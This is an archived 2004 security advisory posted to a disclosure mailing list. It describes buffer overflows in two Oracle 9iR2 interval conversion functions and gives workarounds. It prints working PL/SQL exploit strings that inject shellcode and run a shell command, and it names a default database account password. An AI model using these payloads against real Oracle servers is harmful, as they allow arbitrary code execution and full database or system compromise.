lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [thread-next>] [day] [month] [year] [list] 
From: cesarc56 at yahoo.com (Cesar)
Subject: Oracle Database 9ir2 Interval Conversion Functions Buffer Overflow

Security Advisory

Name:  Oracle Database 9ir2 Interval Conversion
Functions Buffer Overflow.
System Affected :  Oracle Database 9ir2, previous
versions could be affected too. 
Severity :  High 
Remote exploitable : Yes
Author:    Cesar Cerrudo.
Date:    02/05/04
Advisory Number:    CC020401


Legal Notice:

This Advisory is Copyright (c) 2003 Cesar Cerrudo.
You may distribute it unmodified and for free. You may
NOT modify it and distribute it or distribute 
parts of it without the author's written permission.
You may NOT use it for commercial intentions 
(this means include it in vulnerabilities databases,
vulnerabilities scanners, any paid service, 
etc.) without the author's written permission. You are
free to use Oracle details for commercial intentions.


Disclaimer:

The information in this advisory is believed to be
true though it may be false.
The opinions expressed in this advisory are my own and
not of any company. The usual standard 
disclaimer applies, especially the fact that Cesar
Cerrudo is not liable for any damages caused 
by direct or indirect use of the information or
functionality provided by this advisory. 
Cesar Cerrudo bears no responsibility for content or
misuse of this advisory or any derivatives thereof.



!!!!!!!!!!!ALERT!!!!!!!!!!!:

Oracle was contacted about these vulnerabilities, but
their Security Response Team is one of the worst that 
i have deal with, they don't care about security and
they don't even follow OISafety rules(Oracle is a
member).
Because this reason we only have told to Oracle about
just a couple of bugs, i think i won't contact them
anymore, 
or maybe if i get a letter from Larry Ellison asking
for apologies...:).
Anyways if Oracle would spend more money on security
than in marketing saying that their products are
unbreakable 
everything would be different. Right now Oracle
database server and other Oracle products are some
kind of backdoor.
These vulnerabilities are just only a bit of +60 that
we have identified (yes more than 60 issues and 
most of these issues can be exploited by any low
privileged user to take complete control over the 
database and probably OS, also for some of them there
aren't any workarounds). If you are running Oracle i 
recomend you to start praying to not being hacked and
to start complaining to Oracle to improve the quality
of 
their products and to release patches.

BTW: if someone from Oracle dares to say that i'm not
telling the true, then probably i will release all the
holes 
information to shut their mouths.

Some workaround to protect your Oracle servers until
maybe next year when Oracle probably could fix their
buggy 
database server:

-Check packages permissions and remove public
permission, set minimal permissions 
that fit your needs.
-Check Directory Objects permissions and remove public
permission, set minimal permissions 
that fit your need, remove Directory Objecs if not
used.
-Restrict users to execute directly PL/SQL statements
over the server.
-Periodically audit users permissions on all database
objects.
-Lock users that aren't used.
-Change default passwords.
If you want automation, i really like AppDetective for
Oracle:
http://www.appsecinc.com/products/appdetective/oracle/


Overview:

Oracle Database Server is one of the most used
database servers in the world, it was marketed 
as being unbreakable and many people thinks that is
one of the most secure database server in 
the market. Larry Ellison (Oracle CEO) says that
Oracle is used by NSA, CIA, russian intelligence,
goverments, etc. 
(www.commonwealthclub.org/archive/96/96-03ellison-qa.html),
so it must be really secure!!!
Oracle Database Server provides two functions that can
be used with PL/SQL to convert numbers 
to date/time intervals, these functions have buffer
overflow vulnerebilities.



Details:

When any of these conversion funcions are called with
a long string as a second 
parameter a buffer overflow occurs.

To reproduce the overflow execute the next PL/SQL:

SELECT NUMTOYMINTERVAL(1,'longstringhere') from dual;

SELECT NUMTODSINTERVAL(1,'longstringhere') from dual;



This vulnerability can be exploited by any Oracle
Database user because access to these 
functions can't be restricted.
Explotation of this vulnerability allow an attacker to
execute arbitrary code, also it 
can be exploited to cause DOS (Denial of service)
killing Oracle server process. An attacker can 
complete compromise the OS and database if Oracle is
running on Windows plataform, because Oracle must 
run under the local System account or under an
administrative account. If Oracle is running on *nix 
then only the database could be compromised because
Oracle runs mostly under oracle user which has
restricted 
permissions.
Important!: Explotation of these vulnerabilities
becomes easy if Oracle Internet Directory has 
been deployed, because Oracle Internet Directory
creates a database user called ODSCOMMON that 
has a default password ODSCOMMON (Unbreakable???,
hahaha, please take a look at this 

http://igloo.its.unimelb.edu.au/Webmail/tips/msg00762.html),
this password can not be changed, 
so any attacker can use this user to connect to
database and exploit these vunerabilities.


Full tests on Oracle database 9ir2 under Microsoft
Windows 2000 Server and Linux confirm these
vulnerabilities, 
versions running in other OS plataforms are believed
to be affected too.
Previous Oracle Database Server versions could be
affected by these vulnerabilities.



Exploits:

--these exploits should work on W2K Server and WinXp,
not tested on Win2003. 
--run any command at the end of the string
SELECT
NUMTOYMINTERVAL(1,'AAAAAAAAAABBBBBBBBBBCCCCCCCCCCABCDEFGHIJKLMNOPQR'
|| 

chr(59)||chr(79)||chr(150)||chr(01)||chr(141)||chr(68)||chr(36)||chr(18)||chr(80)||chr(255)||chr(21)||chr(52)||chr(35)||chr(1

48)||chr(01)||chr(255)||chr(37)||chr(172)||chr(33)||chr(148)||chr(01)||chr(32)||'echo
ARE YOU SURE? >c:\Unbreakable.txt')  

FROM DUAL;

SELECT
NUMTODSINTERVAL(1,'AAAAAAAAAABBBBBBBBBBCCCCCCCCCCABCDEFGHIJKLMNOPQR'
|| 

chr(59)||chr(79)||chr(150)||chr(01)||chr(141)||chr(68)||chr(36)||chr(18)||chr(80)||chr(255)||chr(21)||chr(52)||chr(35)||chr(1

48)||chr(01)||chr(255)||chr(37)||chr(172)||chr(33)||chr(148)||chr(01)||chr(32)||'echo
ARE YOU SURE? >c:\Unbreakable.txt')  

FROM DUAL;



Vendor Fix:

Go to Oracle Metalink site, http://metalink.oracle.com


Vendor Contact:

Oracle was contacted and they released a fix without
telling me nor the public anything and without issuing
an alert.




__________________________________
Do you Yahoo!?
Yahoo! Finance: Get your refund fast by filing online.
http://taxes.yahoo.com/filing.html

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ